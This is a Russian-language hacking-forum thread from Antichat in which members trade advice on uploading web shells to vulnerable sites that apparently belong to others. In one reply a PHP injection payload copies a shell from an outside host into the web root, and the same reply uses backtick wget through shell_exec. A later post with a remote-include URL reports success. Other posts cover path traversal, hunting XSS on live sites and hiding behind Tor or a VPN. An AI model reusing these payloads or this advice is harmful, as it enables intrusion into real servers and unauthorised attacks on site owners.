HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.01.2012, 00:18
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Skipp  
Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.
4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти

Цитата:
Сообщение от shadowrun  
/ 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
не?
это когда pg.php стал папкой?
 
Ответить с цитированием

  #2  
Старый 09.01.2012, 00:18
Skipp
Новичок
Регистрация: 12.05.2010
Сообщений: 2
С нами: 8421303

Репутация: 0
По умолчанию

Да, понятно.
 
Ответить с цитированием

  #3  
Старый 09.01.2012, 00:45
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию

Нашел уязвимость, отсылаю пост запрос с содержимым:

$modi=

все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h

Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:

file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';

только как избавится от кавычек?
 
Ответить с цитированием

  #4  
Старый 09.01.2012, 00:47
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от ocheretko  
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?
copy($_GET[a],$_GET);

через гет отправь

a=http://site.ru/shell.txt&b=/var/www/html/shell.php

если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl
 
Ответить с цитированием

  #5  
Старый 09.01.2012, 00:48
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами: 8686406

Репутация: 265


По умолчанию

Цитата:
Сообщение от NZT  
stepashka_
, скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или
Tor достаточно для этих сайтов?
Поставь себе на комп бажную цмс и тренируйся

Или купи vpn.
 
Ответить с цитированием

  #6  
Старый 09.01.2012, 01:19
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию

Благодарю, все получилось, +1 прием в голову

PHP код:
[COLOR="#000000"]Dim url as String = "example.com"

Dim postdata As String = "modi=[COLOR="#0000BB"][/COLOR]"

openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"[/COLOR
 
Ответить с цитированием

  #7  
Старый 09.01.2012, 09:53
NZT
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами: 7561046

Репутация: 0
По умолчанию

Цитата:
Сообщение от stepashka_  
Поставь себе на комп бажную цмс и тренируйся
Или купи vpn.
Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней )

А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю )

Спасибо.

И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?
 
Ответить с цитированием

  #8  
Старый 09.01.2012, 13:05
DyukiN
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
С нами: 7811606

Репутация: 21
По умолчанию

как залить шелл в xoops через админку?
 
Ответить с цитированием

  #9  
Старый 09.01.2012, 14:33
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от DyukiN  
как залить шелл в xoops через админку?
/showpost.php?p=2962252&postcount=4
 
Ответить с цитированием

  #10  
Старый 09.01.2012, 15:31
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...